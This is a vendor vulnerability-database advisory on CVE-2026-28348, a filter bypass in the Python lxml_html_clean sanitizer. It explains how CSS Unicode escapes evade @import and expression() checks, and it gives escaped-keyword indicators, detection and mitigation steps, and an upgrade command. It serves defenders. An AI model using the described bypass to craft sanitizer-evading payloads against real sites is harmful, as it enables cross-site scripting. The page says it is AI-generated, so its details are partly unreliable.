The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-28348

CVE-2026-28348: lxml_html_clean XSS Vulnerability

CVE-2026-28348 is an XSS vulnerability in lxml_html_clean that allows CSS Unicode escape sequences to bypass filters, enabling external CSS loading or XSS attacks. This article covers technical details, affected versions, and mitigation.

Published: March 6, 2026

CVE-2026-28348 Overview

CVE-2026-28348 is a Cross-Site Scripting (XSS) and CSS injection vulnerability in lxml_html_clean, a Python project that provides HTML cleaning functionalities copied from lxml.html.clean. Prior to version 0.4.4, the _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This behavior allows CSS Unicode escape sequences to bypass the @import and expression() filters, enabling external CSS loading or XSS attacks in older browsers.

Critical Impact

Attackers can bypass HTML sanitization filters using CSS Unicode escape sequences, potentially leading to cross-site scripting attacks or loading of external malicious CSS in applications that rely on lxml_html_clean for input sanitization.

Affected Products

  • lxml_html_clean versions prior to 0.4.4
  • Applications using lxml_html_clean for HTML sanitization
  • Python web applications relying on lxml.html.clean functionality

Discovery Timeline

  • 2026-03-05 - CVE CVE-2026-28348 published to NVD
  • 2026-03-05 - Last updated in NVD database

Technical Details for CVE-2026-28348

Vulnerability Analysis

The vulnerability resides in the _has_sneaky_javascript() method within lxml_html_clean, which is responsible for detecting and filtering potentially dangerous JavaScript patterns in CSS. The method's implementation contains a flaw in how it processes CSS content before performing security checks.

When processing CSS input, the method strips backslash characters before evaluating the content against a list of dangerous keywords such as @import and expression(). This preprocessing step inadvertently enables attackers to craft CSS payloads using Unicode escape sequences that evade detection.

CSS supports Unicode escape sequences in the format \XX or \XXXXXX where X represents hexadecimal digits. By encoding characters of dangerous keywords using these escape sequences, an attacker can construct payloads that appear benign to the filter but are interpreted as valid CSS by browsers.

For example, the @import directive could be obfuscated using Unicode escapes, allowing an attacker to load external stylesheets from attacker-controlled domains. Similarly, the expression() function, which is supported in older versions of Internet Explorer, could be encoded to execute arbitrary JavaScript within style attributes.

Root Cause

The root cause is improper output encoding handling (CWE-116) in the CSS security filtering logic. The _has_sneaky_javascript() method removes backslashes from CSS content before checking for dangerous patterns, but CSS parsers in browsers will decode Unicode escape sequences after the sanitization has occurred. This creates a disconnect between what the sanitizer sees and what the browser interprets, enabling a classic filter bypass vulnerability.

Attack Vector

The attack requires user interaction where a victim must view content containing the malicious CSS payload. The attack can be delivered through any application input that is processed by lxml_html_clean, such as user-generated content, comment fields, or any HTML input that undergoes sanitization. When the sanitized content is rendered in a browser, the CSS Unicode escape sequences are decoded, and the malicious directives are executed.

The vulnerability specifically targets:

  • External CSS loading via obfuscated @import statements, which can be used for data exfiltration or content injection
  • XSS execution via the expression() function in legacy Internet Explorer browsers

The attack is network-based, requiring no privileges on the target system, but does require user interaction to trigger. The scope is changed, meaning successful exploitation can impact resources beyond the vulnerable component.

Detection Methods for CVE-2026-28348

Indicators of Compromise

  • CSS content containing unusual Unicode escape sequences, particularly patterns like \0040import or \0065xpression
  • Web application logs showing style attributes or CSS blocks with multiple backslash-escaped characters
  • Requests to external stylesheets from unexpected or unknown domains referenced in user-generated content
  • Browser console errors related to blocked CSS resources when Content Security Policy is enforced

Detection Strategies

  • Implement input validation rules to detect CSS content with Unicode escape sequences in style-related contexts
  • Monitor for anomalous CSS patterns in user-submitted content, particularly escape sequences near CSS function calls or directives
  • Deploy web application firewall (WAF) rules to flag CSS content containing obfuscated @import or expression() patterns
  • Review application dependencies to identify usage of lxml_html_clean versions prior to 0.4.4

Monitoring Recommendations

  • Enable verbose logging for HTML sanitization operations to capture potentially malicious input attempts
  • Configure Content Security Policy (CSP) headers with style-src directives to restrict external stylesheet loading
  • Implement real-time monitoring for outbound connections to unknown domains that could indicate CSS-based data exfiltration
  • Set up dependency vulnerability scanning to alert on outdated lxml_html_clean versions in your software supply chain

How to Mitigate CVE-2026-28348

Immediate Actions Required

  • Upgrade lxml_html_clean to version 0.4.4 or later immediately
  • Review and audit all user-generated content that may have been processed by vulnerable versions
  • Implement Content Security Policy headers to restrict inline styles and external stylesheet sources as a defense-in-depth measure
  • Consider adding secondary validation for CSS content in security-critical applications

Patch Information

The vulnerability has been patched in lxml_html_clean version 0.4.4. The fix addresses the backslash stripping behavior in the _has_sneaky_javascript() method to properly handle CSS Unicode escape sequences before security filtering.

For detailed information about the fix, refer to the GitHub Security Advisory and the commit implementing the patch.

Workarounds

  • Implement additional CSS validation logic at the application layer that decodes Unicode escape sequences before filtering
  • Use Content Security Policy headers with strict style-src directives to block external CSS and inline styles where feasible
  • Disable or filter the expression() function and @import directive at the application level as an additional layer of defense
  • Consider using alternative HTML sanitization libraries that properly handle CSS Unicode escape sequences if upgrading is not immediately possible
bash
# Upgrade lxml_html_clean to patched version
pip install --upgrade lxml_html_clean>=0.4.4

# Verify installed version
pip show lxml_html_clean | grep Version

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS
  • Vendor/TechLxml
  • SeverityMEDIUM
  • CVSS Score6.1
  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityLow
  • AvailabilityNone
  • CWE References
  • CWE-116
  • Technical References
  • GitHub Commit Update
  • GitHub Security Advisory
  • Related CVEs
  • CVE-2026-28350: lxml_html_clean XSS Vulnerability
  • CVE-2020-27783: Lxml Python Library XSS Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English